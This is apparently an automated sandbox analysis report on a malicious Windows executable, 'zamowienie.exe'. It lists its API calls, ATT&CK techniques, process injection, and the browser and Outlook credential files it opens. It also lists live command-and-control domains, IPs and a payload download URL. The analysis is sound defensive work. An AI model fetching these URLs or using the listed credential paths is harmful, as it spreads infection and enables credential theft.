    Source: dmQRVBQMPL.exe, 00000006.00000000.2857850800.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000006.00000002.3906770467.0000000001231000.00000002.00000001.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000000.3019214436.0000000000F31000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034F1

    Stealing of Sensitive Information

    barindex
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
    Source: C:\Windows\SysWOW64\verclsid.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Tries to steal Mail credentials (via file / registry access)
    Source: C:\Windows\SysWOW64\verclsid.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API    		1
    Registry Run Keys / Startup Folder    		1
    Access Token Manipulation    		11
    Masquerading    		1
    OS Credential Dumping    		221
    Security Software Discovery    		Remote Services1
    Email Collection    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading    		312
    Process Injection    		2
    Virtualization/Sandbox Evasion    		LSASS Memory2
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Archive Collected Data    		3
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Abuse Elevation Control Mechanism    		1
    Access Token Manipulation    		Security Account Manager2
    Process Discovery    		SMB/Windows Admin Shares1
    Data from Local System    		4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    Registry Run Keys / Startup Folder    		312
    Process Injection    		NTDS1
    Application Window Discovery    		Distributed Component Object Model1
    Clipboard Data    		5
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
    DLL Side-Loading    		1
    Deobfuscate/Decode Files or Information    		LSA Secrets4
    File and Directory Discovery    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Abuse Elevation Control Mechanism    		Cached Domain Credentials24
    System Information Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
    Obfuscated Files or Information    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539242 Sample: zamowienie.exe Startdate: 22/10/2024 Architecture: WINDOWS Score: 92 32 yourwebbuzz.net 2->32 34 www.yourwebbuzz.net 2->34 36 9 other IPs or domains 2->36 48 Antivirus / Scanner detection for submitted sample 2->48 50 Yara detected GuLoader 2->50 52 AI detected suspicious sample 2->52 10 zamowienie.exe 5 40 2->10         started        signatures3 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 10->30 dropped 64 Tries to detect virtualization through RDTSC time measurements 10->64 66 Switches to a custom stack to bypass stack traces 10->66 14 zamowienie.exe 6 10->14         started        signatures6 process7 dnsIp8 44 kambud.biz 185.17.43.223, 443, 49876 ARTNETPL Poland 14->44 68 Maps a DLL or memory area into another process 14->68 18 dmQRVBQMPL.exe 14->18 injected signatures9 process10 signatures11 46 Found direct / indirect Syscall (likely to bypass EDR) 18->46 21 verclsid.exe 13 18->21         started        process12 signatures13 54 Tries to steal Mail credentials (via file / registry access) 21->54 56 Tries to harvest and steal browser information (history, passwords, etc) 21->56 58 Modifies the context of a thread in another process (thread injection) 21->58 60 3 other signatures 21->60 24 dmQRVBQMPL.exe 21->24 injected 28 firefox.exe 21->28         started        process14 dnsIp15 38 www.newhopetoday.app 216.40.34.41, 49978, 49979, 49980 TUCOWSCA Canada 24->38 40 nutrigenfit.online 195.110.124.133, 49986, 49987, 49988 REGISTER-ASIT Italy 24->40 42 4 other IPs or domains 24->42 62 Found direct / indirect Syscall (likely to bypass EDR) 24->62 signatures16

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    zamowienie.exe5%ReversingLabsWin32.Trojan.Sonbokli
    zamowienie.exe100%AviraHEUR/AGEN.1361137

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsz31BB.tmp\System.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
    https://www.ecosia.org/newtab/0%URL Reputationsafe
    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
    http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    www.newhopetoday.app
    		216.40.34.41
    		truefalse
      		unknown
      yourwebbuzz.net
      		3.33.130.190
      		truefalse
        		unknown
        ladylawher.org
        		3.33.130.190
        		truefalse
          		unknown
          www.svarus.online
          		194.58.112.174
          		truefalse
            		unknown
            www.3808.app
            		13.248.169.48
            		truefalse
              		unknown
              www.gold-rates.online
              		199.59.243.227
              		truefalse
                		unknown
                nutrigenfit.online
                		195.110.124.133
                		truefalse
                  		unknown
                  kambud.biz
                  		185.17.43.223
                  		truefalse
                    		unknown
                    www.ladylawher.org
                    		unknown
                    		unknownfalse
                      		unknown
                      www.yourwebbuzz.net
                      		unknown
                      		unknownfalse
                        		unknown
                        www.nutrigenfit.online
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.nutrigenfit.online/8gyb/false
                            		unknown
                            http://www.3808.app/t4fd/?-v4puN=TWeRtNzMfmNEvdcXbWkMHnJ/F6flcjr/el8zumz71ZoVA0OJu/n5oRxSGdedcGZFrD4yQtyH27/zNp/ws5+MDNRefURZz6yILQV3scYXQq64Zh/qDiP6EAtr8QHYkOuA6w==&vd=fhUlwfGxBn-ttfalse
                              		unknown
                              http://www.ladylawher.org/tcwz/?vd=fhUlwfGxBn-tt&-v4puN=X5cFJf7HFuS/xVOc5sSh+Hrfp4eRpmHBiZNITnwuLXQtfpi955BzQ8MtI/Oo5RgXSpSv2VRHuXNT9Azn4jxaM1RW1Sv60yoj6GSBXC/EsqLKRI7QEkNRexaswW0RsPsQQg==false
                                		unknown
                                http://www.gold-rates.online/rod1/false
                                  		unknown
                                  http://www.yourwebbuzz.net/bx4s/?-v4puN=te/eyMGfj2LevQDtupbEc4IvglH1yiUBN7XUzJxRyOvhTaKlw0FBVO2yb8CkSWCznwZRCZkdWablXAYeUkNRjY0I5ry1q7WyBxeQiSsAbTFcbcoKMMkLDPAENOgL+G9ORQ==&vd=fhUlwfGxBn-ttfalse
                                    		unknown
                                    https://kambud.biz/uCEVRNHZgMA26.binfalse
                                      		unknown
                                      http://www.newhopetoday.app/y868/?-v4puN=/snO2OMeD1KGuCX8I8PTb0wPk7oIGCcnJpJV3p53H8t3rhvkFO7Hu8uja/+IWsU7s0a4pmtYzeb4/oul2jeOp0uvryv675HptA9HxwsyIlIOO11NrggPw5LqW5SmsafU0A==&vd=fhUlwfGxBn-ttfalse
                                        		unknown
                                        http://www.ladylawher.org/tcwz/false
                                          		unknown
                                          http://www.newhopetoday.app/y868/false
                                            		unknown
                                            http://www.gold-rates.online/rod1/?vd=fhUlwfGxBn-tt&-v4puN=625sgw1Vn/LiYNFkuNXWgUQa6VpWz6NoZgO4nBFbZUGQF7cSiahkAd5Np5VrTvFPZWnEzDVMZ2bBqmHKU8WTD6xVXOOHKx/2RY/6WwAhCi5V31VMR0XJVnQWnK4Gp4bSPg==false
                                              		unknown
                                              http://www.svarus.online/sa87/?vd=fhUlwfGxBn-tt&-v4puN=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8NGP70JKOBpAfy7n0mtS8Kr3O7U4faJdfEPNjknslXQEWEA==false
                                                		unknown
                                                http://www.nutrigenfit.online/8gyb/?-v4puN=oHLOMFnpuCQwEmmcfjaPzEs/vXwrZtaPQF7csdtv5Eh2A0RcvZoTiB5djAiNITJM5AjEN183LiB5K62qTN14+moW7AK7WqEInxUu+7Nqydpi+78xinwtbpXqTzluMhpRfQ==&vd=fhUlwfGxBn-ttfalse
                                                  		unknown
                                                  http://www.3808.app/t4fd/false
                                                    		unknown
                                                    http://www.yourwebbuzz.net/bx4s/false
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabverclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://duckduckgo.com/ac/?q=verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://reg.ruverclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.instagram.com/hover_domainsverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.reg.ru/dedicated/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_severclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            		unknown
                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.hover.com/email?source=parkedverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		unknown
                                                              https://www.reg.ru/whois/?check=&dname=www.svarus.online&amp;reg_source=parking_autoverclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                		unknown
                                                                https://www.hover.com/about?source=parkedverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://kambud.biz/uCEVRNHZgMA26.binvzamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://www.google.comverclsid.exe, 00000007.00000002.3907764738.0000000005EDC000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.00000000033EC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdzamowienie.exe, 00000003.00000001.2433379972.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                        		unknown
                                                                        https://www.hover.com/domains/resultsverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchverclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://kambud.biz/uCEVRNHZgMA26.bin(zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://parking.reg.ru/script/get_domain_data?domain_name=www.svarus.online&rand=verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                		unknown
                                                                                https://www.hover.com/tools?source=parkedverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://help.hover.com/home?source=parkedverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://www.hover.com/domain_pricing?source=parkedverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://www.hover.com/privacy?source=parkedverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://twitter.com/hoververclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://www.hover.com/transfer_in?source=parkedverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://www.hover.com/renew?source=parkedverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://www.reg.ru/domain/new/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_nverclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                http://www.ftp.ftp://ftp.gopher.zamowienie.exe, 00000003.00000001.2433379972.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorzamowienie.exefalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://www.ecosia.org/newtab/verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://www.3808.appdmQRVBQMPL.exe, 00000008.00000002.3908164269.0000000004E55000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://kambud.biz/uCEVRNHZgMA26.bin6zamowienie.exe, 00000003.00000002.2942603184.0000000004DD9000.00000004.00000020.00020000.00000000.sdmp, zamowienie.exe, 00000003.00000003.2842507580.0000000004DD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://ac.ecosia.org/autocomplete?q=verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://nsis.sf.net/NSIS_Errorzamowienie.exefalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        https://www.hover.com/tos?source=parkedverclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://kambud.biz/zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://www.reg.ru/sozdanie-saita/verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdzamowienie.exe, 00000003.00000001.2433379972.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://www.reg.ru/hosting/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_hostverclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://kambud.biz/:zamowienie.exe, 00000003.00000002.2942186230.0000000004D87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=verclsid.exe, 00000007.00000002.3909369946.0000000007FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://www.hover.com/?source=parkeddmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		unknown

                                                                                                                      World Map of Contacted IPs

                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs

                                                                                                                      Public IPs

                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      13.248.169.48
                                                                                                                      		www.3808.appUnited States
                                                                                                                      		16509AMAZON-02USfalse
                                                                                                                      195.110.124.133
                                                                                                                      		nutrigenfit.onlineItaly
                                                                                                                      		39729REGISTER-ASITfalse
                                                                                                                      185.17.43.223
                                                                                                                      		kambud.bizPoland
                                                                                                                      		197155ARTNETPLfalse
                                                                                                                      199.59.243.227
                                                                                                                      		www.gold-rates.onlineUnited States
                                                                                                                      		395082BODIS-NJUSfalse
                                                                                                                      194.58.112.174
                                                                                                                      		www.svarus.onlineRussian Federation
                                                                                                                      		197695AS-REGRUfalse
                                                                                                                      3.33.130.190
                                                                                                                      		yourwebbuzz.netUnited States
                                                                                                                      		8987AMAZONEXPANSIONGBfalse
                                                                                                                      216.40.34.41
                                                                                                                      		www.newhopetoday.appCanada
                                                                                                                      		15348TUCOWSCAfalse

                                                                                                                      General Information

                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1539242
                                                                                                                      Start date and time:2024-10-22 13:25:03 +02:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 10m 22s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Run name:Run with higher sleep bypass
                                                                                                                      Number of analysed new started processes analysed:8
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:2
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:zamowienie.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal92.troj.spyw.evad.winEXE@7/15@8/7
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 75%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 86%
                                                                                                                      • Number of executed functions: 105
                                                                                                                      • Number of non-executed functions: 309
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                      Warnings

                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: zamowienie.exe

                                                                                                                      Simulations

                                                                                                                      Behavior and APIs

                                                                                                                      TimeTypeDescription
                                                                                                                      07:28:02API Interceptor2421579x Sleep call for process: verclsid.exe modified

                                                                                                                      Joe Sandbox View / Context

                                                                                                                      IPs

                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      13.248.169.48PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                      • www.ila.beauty/izfe/
                                                                                                                      Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                      • www.discountprice.shop/dmec/
                                                                                                                      request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                      • www.3808.app/4do9/
                                                                                                                      NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • www.3808.app/4do9/
                                                                                                                      PR. No.1599-Rev.2.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • www.moneta.life/qzre/
                                                                                                                      lByv6mqTCJ.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.comedy.finance/mwd0/
